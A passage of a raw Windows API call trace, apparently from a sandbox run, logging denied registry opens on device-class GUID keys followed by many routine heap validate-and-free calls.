samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.054] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E972-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.055] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E973-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.055] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E974-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.056] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E975-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.056] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E977-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.057] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E97B-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.057] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E97D-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.058] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E980-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.058] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{50DD5230-BA8A-11D1-BF5D-0000F805F530}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.058] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{533C5B84-EC70-11D2-9505-00C04F79DEAF}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.059] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.059] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{71A27CDD-812A-11D0-BEC7-08002BE2092F}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.060] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.060] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.061] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0176.061] GetProcessHeap () returned 0x4a0000 [0176.061] GetProcessHeap () returned 0x4a0000 [0176.061] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ab8) returned 1 [0176.090] GetProcessHeap () returned 0x4a0000 [0176.090] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3ab8) returned 0x8 [0176.090] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ab8 | out: hHeap=0x4a0000) returned 1 [0176.090] GetProcessHeap () returned 0x4a0000 [0176.090] GetProcessHeap () returned 0x4a0000 [0176.090] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b28) returned 1 [0176.090] GetProcessHeap () returned 0x4a0000 [0176.090] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5b28) returned 0x14 [0176.090] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x4a0000) returned 1 [0176.090] GetProcessHeap () returned 0x4a0000 [0176.090] GetProcessHeap () returned 0x4a0000 [0176.090] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5df8) returned 1 [0176.091] GetProcessHeap () returned 0x4a0000 [0176.091] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5df8) returned 0x10 [0176.091] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5df8 | out: hHeap=0x4a0000) returned 1 [0176.091] GetProcessHeap () returned 0x4a0000 [0176.091] GetProcessHeap () returned 0x4a0000 [0176.091] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b08) returned 1 [0176.091] GetProcessHeap () returned 0x4a0000 [0176.091] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5b08) returned 0x14 [0176.091] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b08 | out: hHeap=0x4a0000) returned 1 [0176.091] GetProcessHeap () returned 0x4a0000 [0176.091] GetProcessHeap () returned 0x4a0000 [0176.091] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e10) returned 1 [0176.091] GetProcessHeap () returned 0x4a0000 [0176.092] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e10) returned 0x10 [0176.092] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e10 | out: hHeap=0x4a0000) returned 1 [0176.092] GetProcessHeap () returned 0x4a0000 [0176.092] GetProcessHeap () returned 0x4a0000 [0176.092] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ae8) returned 1 [0176.092] GetProcessHeap () returned 0x4a0000 [0176.092] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ae8) returned 0x14 [0176.092] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ae8 | out: hHeap=0x4a0000) returned 1 [0176.092] GetProcessHeap () returned 0x4a0000 [0176.092] GetProcessHeap () returned 0x4a0000 [0176.092] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e28) returned 1 [0176.092] GetProcessHeap () returned 0x4a0000 [0176.092] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e28) returned 0xa [0176.092] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e28 | out: hHeap=0x4a0000) returned 1 [0176.092] GetProcessHeap () returned 0x4a0000 [0176.093] GetProcessHeap () returned 0x4a0000 [0176.093] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ac8) returned 1 [0176.093] GetProcessHeap () returned 0x4a0000 [0176.095] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ac8) returned 0x14 [0176.095] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ac8 | out: hHeap=0x4a0000) returned 1 [0176.095] GetProcessHeap () returned 0x4a0000 [0176.095] GetProcessHeap () returned 0x4a0000 [0176.096] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5238) returned 1 [0176.096] GetProcessHeap () returned 0x4a0000 [0176.096] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5238) returned 0x8 [0176.096] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5238 | out: hHeap=0x4a0000) returned 1 [0176.096] GetProcessHeap () returned 0x4a0000 [0176.096] GetProcessHeap () returned 0x4a0000 [0176.096] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5aa8) returned 1 [0176.096] GetProcessHeap () returned 0x4a0000 [0176.096] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5aa8) returned 0x14 [0176.096] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5aa8 | out: hHeap=0x4a0000) returned 1 [0176.096] GetProcessHeap () returned 0x4a0000 [0176.096] GetProcessHeap () returned 0x4a0000 [0176.096] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50a8) returned 1 [0176.097] GetProcessHeap () returned 0x4a0000 [0176.097] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b50a8) returned 0x24 [0176.097] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50a8 | out: hHeap=0x4a0000) returned 1 [0176.097] GetProcessHeap () returned 0x4a0000 [0176.097] GetProcessHeap () returned 0x4a0000 [0176.097] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a88) returned 1 [0176.097] GetProcessHeap () returned 0x4a0000 [0176.097] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a88) returned 0x14 [0176.097] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a88 | out: hHeap=0x4a0000) returned 1 [0176.097] GetProcessHeap () returned 0x4a0000 [0176.097] GetProcessHeap () returned 0x4a0000 [0176.097] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50d8) returned 1 [0176.097] GetProcessHeap () returned 0x4a0000 [0176.097] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b50d8) returned 0x22 [0176.098] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50d8 | out: hHeap=0x4a0000) returned 1 [0176.098] GetProcessHeap () returned 0x4a0000 [0176.098] GetProcessHeap () returned 0x4a0000 [0176.098] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a68) returned 1 [0176.098] GetProcessHeap () returned 0x4a0000 [0176.098] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a68) returned 0x14 [0176.098] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a68 | out: hHeap=0x4a0000) returned 1 [0176.098] GetProcessHeap () returned 0x4a0000 [0176.098] GetProcessHeap () returned 0x4a0000 [0176.098] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e40) returned 1 [0176.098] GetProcessHeap () returned 0x4a0000 [0176.098] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e40) returned 0xe [0176.098] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e40 | out: hHeap=0x4a0000) returned 1 [0176.099] GetProcessHeap () returned 0x4a0000 [0176.099] GetProcessHeap () returned 0x4a0000 [0176.099] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a48) returned 1 [0176.099] GetProcessHeap () returned 0x4a0000 [0176.099] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a48) returned 0x14 [0176.099] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a48 | out: hHeap=0x4a0000) returned 1 [0176.099] GetProcessHeap () returned 0x4a0000 [0176.099] GetProcessHeap () returned 0x4a0000 [0176.099] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e58) returned 1 [0176.099] GetProcessHeap () returned 0x4a0000 [0176.099] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e58) returned 0x10 [0176.099] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e58 | out: hHeap=0x4a0000) returned 1 [0176.099] GetProcessHeap () returned 0x4a0000 [0176.100] GetProcessHeap () returned 0x4a0000 [0176.100] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a28) returned 1 [0176.100] GetProcessHeap () returned 0x4a0000 [0176.100] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a28) returned 0x14 [0176.100] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a28 | out: hHeap=0x4a0000) returned 1 [0176.100] GetProcessHeap () returned 0x4a0000 [0176.100] GetProcessHeap () returned 0x4a0000 [0176.100] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a08) returned 1 [0176.100] GetProcessHeap () returned 0x4a0000 [0176.100] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a08) returned 0x12 [0176.100] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a08 | out: hHeap=0x4a0000) returned 1 [0176.100] GetProcessHeap () returned 0x4a0000 [0176.101] GetProcessHeap () returned 0x4a0000 [0176.101] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59e8) returned 1 [0176.101] GetProcessHeap () returned 0x4a0000 [0176.101] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b59e8) returned 0x14 [0176.101] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59e8 | out: hHeap=0x4a0000) returned 1 [0176.101] GetProcessHeap () returned 0x4a0000 [0176.101] GetProcessHeap () returned 0x4a0000 [0176.101] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59c8) returned 1 [0176.101] GetProcessHeap () returned 0x4a0000 [0176.101] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b59c8) returned 0x16 [0176.101] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59c8 | out: hHeap=0x4a0000) returned 1 [0176.101] GetProcessHeap () returned 0x4a0000 [0176.101] GetProcessHeap () returned 0x4a0000 [0176.101] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59a8) returned 1 [0176.102] GetProcessHeap () returned 0x4a0000 [0176.102] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b59a8) returned 0x14 [0176.102] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59a8 | out: hHeap=0x4a0000) returned 1 [0176.102] GetProcessHeap () returned 0x4a0000 [0176.102] GetProcessHeap () returned 0x4a0000 [0176.102] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e70) returned 1 [0176.102] GetProcessHeap () returned 0x4a0000 [0176.102] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e70) returned 0xa [0176.102] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e70 | out: hHeap=0x4a0000) returned 1 [0176.102] GetProcessHeap () returned 0x4a0000 [0176.102] GetProcessHeap () returned 0x4a0000 [0176.102] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5988) returned 1 [0176.102] GetProcessHeap () returned 0x4a0000 [0176.102] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5988) returned 0x14 [0176.103] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5988 | out: hHeap=0x4a0000) returned 1 [0176.103] GetProcessHeap () returned 0x4a0000 [0176.103] GetProcessHeap () returned 0x4a0000 [0176.103] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e88) returned 1 [0176.103] GetProcessHeap () returned 0x4a0000 [0176.103] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e88) returned 0xa [0176.103] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e88 | out: hHeap=0x4a0000) returned 1 [0176.103] GetProcessHeap () returned 0x4a0000 [0176.103] GetProcessHeap () returned 0x4a0000 [0176.103] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5968) returned 1 [0176.103] GetProcessHeap () returned 0x4a0000 [0176.103] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5968) returned 0x14 [0176.103] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5968 | out: hHeap=0x4a0000) returned 1 [0176.104] GetProcessHeap () returned 0x4a0000 [0176.104] GetProcessHeap () returned 0x4a0000 [0176.104] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5948) returned 1 [0176.104] GetProcessHeap () returned 0x4a0000 [0176.104] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5948) returned 0x12 [0176.104] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5948 | out: hHeap=0x4a0000) returned 1 [0176.104] GetProcessHeap () returned 0x4a0000 [0176.104] GetProcessHeap () returned 0x4a0000 [0176.104] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5928) returned 1 [0176.104] GetProcessHeap () returned 0x4a0000 [0176.104] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5928) returned 0x14 [0176.104] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5928 | out: hHeap=0x4a0000) returned 1 [0176.104] GetProcessHeap () returned 0x4a0000 [0176.104] GetProcessHeap () returned 0x4a0000 [0176.105] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ea0) returned 1 [0176.105] GetProcessHeap () returned 0x4a0000 [0176.105] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ea0) returned 0x10 [0176.105] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ea0 | out: hHeap=0x4a0000) returned 1 [0176.105] GetProcessHeap () returned 0x4a0000 [0176.105] GetProcessHeap () returned 0x4a0000 [0176.105] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5908) returned 1 [0176.105] GetProcessHeap () returned 0x4a0000 [0176.105] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5908) returned 0x14 [0176.105] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5908 | out: hHeap=0x4a0000) returned 1 [0176.105] GetProcessHeap () returned 0x4a0000 [0176.105] GetProcessHeap () returned 0x4a0000 [0176.105] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5eb8) returned 1 [0176.105] GetProcessHeap () returned 0x4a0000 [0176.105] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5eb8) returned 0x10 [0176.106] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5eb8 | out: hHeap=0x4a0000) returned 1 [0176.106] GetProcessHeap () returned 0x4a0000 [0176.106] GetProcessHeap () returned 0x4a0000 [0176.106] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58e8) returned 1 [0176.106] GetProcessHeap () returned 0x4a0000 [0176.106] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b58e8) returned 0x14 [0176.106] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58e8 | out: hHeap=0x4a0000) returned 1 [0176.106] GetProcessHeap () returned 0x4a0000 [0176.106] GetProcessHeap () returned 0x4a0000 [0176.106] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5248) returned 1 [0176.106] GetProcessHeap () returned 0x4a0000 [0176.106] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5248) returned 0x8 [0176.106] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5248 | out: hHeap=0x4a0000) returned 1 [0176.106] GetProcessHeap () returned 0x4a0000 [0176.106] GetProcessHeap () returned 0x4a0000 [0176.107] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58c8) returned 1 [0176.107] GetProcessHeap () returned 0x4a0000 [0176.107] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b58c8) returned 0x14 [0176.107] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58c8 | out: hHeap=0x4a0000) returned 1 [0176.107] GetProcessHeap () returned 0x4a0000 [0176.107] GetProcessHeap () returned 0x4a0000 [0176.107] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58a8) returned 1 [0176.107] GetProcessHeap () returned 0x4a0000 [0176.107] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b58a8) returned 0x12 [0176.107] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58a8 | out: hHeap=0x4a0000) returned 1 [0176.107] GetProcessHeap () returned 0x4a0000 [0176.107] GetProcessHeap () returned 0x4a0000 [0176.107] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5888) returned 1 [0176.107] GetProcessHeap () returned 0x4a0000 [0176.108] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5888) returned 0x14 [0176.108] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5888 | out: hHeap=0x4a0000) returned 1 [0176.108] GetProcessHeap () returned 0x4a0000 [0176.108] GetProcessHeap () returned 0x4a0000 [0176.108] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5868) returned 1 [0176.108] GetProcessHeap () returned 0x4a0000 [0176.108] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5868) returned 0x18 [0176.108] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5868 | out: hHeap=0x4a0000) returned 1 [0176.108] GetProcessHeap () returned 0x4a0000 [0176.108] GetProcessHeap () returned 0x4a0000 [0176.253] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5848) returned 1 [0176.254] GetProcessHeap () returned 0x4a0000 [0176.254] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5848) returned 0x14 [0176.254] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5848 | out: hHeap=0x4a0000) returned 1 [0176.254] GetProcessHeap () returned 0x4a0000 [0176.254] GetProcessHeap () returned 0x4a0000 [0176.254] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ed0) returned 1 [0176.254] GetProcessHeap () returned 0x4a0000 [0176.254] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ed0) returned 0xe [0176.254] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ed0 | out: hHeap=0x4a0000) returned 1 [0176.254] GetProcessHeap () returned 0x4a0000 [0176.254] GetProcessHeap () returned 0x4a0000 [0176.254] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5828) returned 1 [0176.255] GetProcessHeap () returned 0x4a0000 [0176.255] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5828) returned 0x14 [0176.255] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5828 | out: hHeap=0x4a0000) returned 1 [0176.255] GetProcessHeap () returned 0x4a0000 [0176.255] GetProcessHeap () returned 0x4a0000 [0176.255] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ee8) returned 1 [0176.255] GetProcessHeap () returned 0x4a0000 [0176.255] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ee8) returned 0x10 [0176.255] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ee8 | out: hHeap=0x4a0000) returned 1 [0176.255] GetProcessHeap () returned 0x4a0000 [0176.255] GetProcessHeap () returned 0x4a0000 [0176.255] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5808) returned 1 [0176.255] GetProcessHeap () returned 0x4a0000 [0176.256] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5808) returned 0x14 [0176.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5808 | out: hHeap=0x4a0000) returned 1 [0176.256] GetProcessHeap () returned 0x4a0000 [0176.256] GetProcessHeap () returned 0x4a0000 [0176.256] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f00) returned 1 [0176.256] GetProcessHeap () returned 0x4a0000 [0176.256] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f00) returned 0xe [0176.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f00 | out: hHeap=0x4a0000) returned 1 [0176.256] GetProcessHeap () returned 0x4a0000 [0176.256] GetProcessHeap () returned 0x4a0000 [0176.256] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57e8) returned 1 [0176.256] GetProcessHeap () returned 0x4a0000 [0176.257] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b57e8) returned 0x14 [0176.257] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57e8 | out: hHeap=0x4a0000) returned 1 [0176.257] GetProcessHeap () returned 0x4a0000 [0176.257] GetProcessHeap () returned 0x4a0000 [0176.257] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57c8) returned 1 [0176.257] GetProcessHeap () returned 0x4a0000 [0176.257] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b57c8) returned 0x14 [0176.257] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57c8 | out: hHeap=0x4a0000) returned 1 [0176.257] GetProcessHeap () returned 0x4a0000 [0176.257] GetProcessHeap () returned 0x4a0000 [0176.257] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57a8) returned 1 [0176.257] GetProcessHeap () returned 0x4a0000 [0176.258] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b57a8) returned 0x14 [0176.258] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57a8 | out: hHeap=0x4a0000) returned 1 [0176.258] GetProcessHeap () returned 0x4a0000 [0176.258] GetProcessHeap () returned 0x4a0000 [0176.258] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f18) returned 1 [0176.258] GetProcessHeap () returned 0x4a0000 [0176.258] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f18) returned 0xe [0176.258] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f18 | out: hHeap=0x4a0000) returned 1 [0176.258] GetProcessHeap () returned 0x4a0000 [0176.258] GetProcessHeap () returned 0x4a0000 [0176.258] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5788) returned 1 [0176.258] GetProcessHeap () returned 0x4a0000 [0176.258] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5788) returned 0x14 [0176.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5788 | out: hHeap=0x4a0000) returned 1 [0176.259] GetProcessHeap () returned 0x4a0000 [0176.259] GetProcessHeap () returned 0x4a0000 [0176.259] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ff0) returned 1 [0176.259] GetProcessHeap () returned 0x4a0000 [0176.259] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3ff0) returned 0x1a [0176.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ff0 | out: hHeap=0x4a0000) returned 1 [0176.259] GetProcessHeap () returned 0x4a0000 [0176.259] GetProcessHeap () returned 0x4a0000 [0176.259] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5768) returned 1 [0176.259] GetProcessHeap () returned 0x4a0000 [0176.259] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5768) returned 0x14 [0176.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5768 | out: hHeap=0x4a0000) returned 1 [0176.260] GetProcessHeap () returned 0x4a0000 [0176.260] GetProcessHeap () returned 0x4a0000 [0176.260] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f38) returned 1 [0176.260] GetProcessHeap () returned 0x4a0000 [0176.260] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6f38) returned 0x24 [0176.260] HeapFree 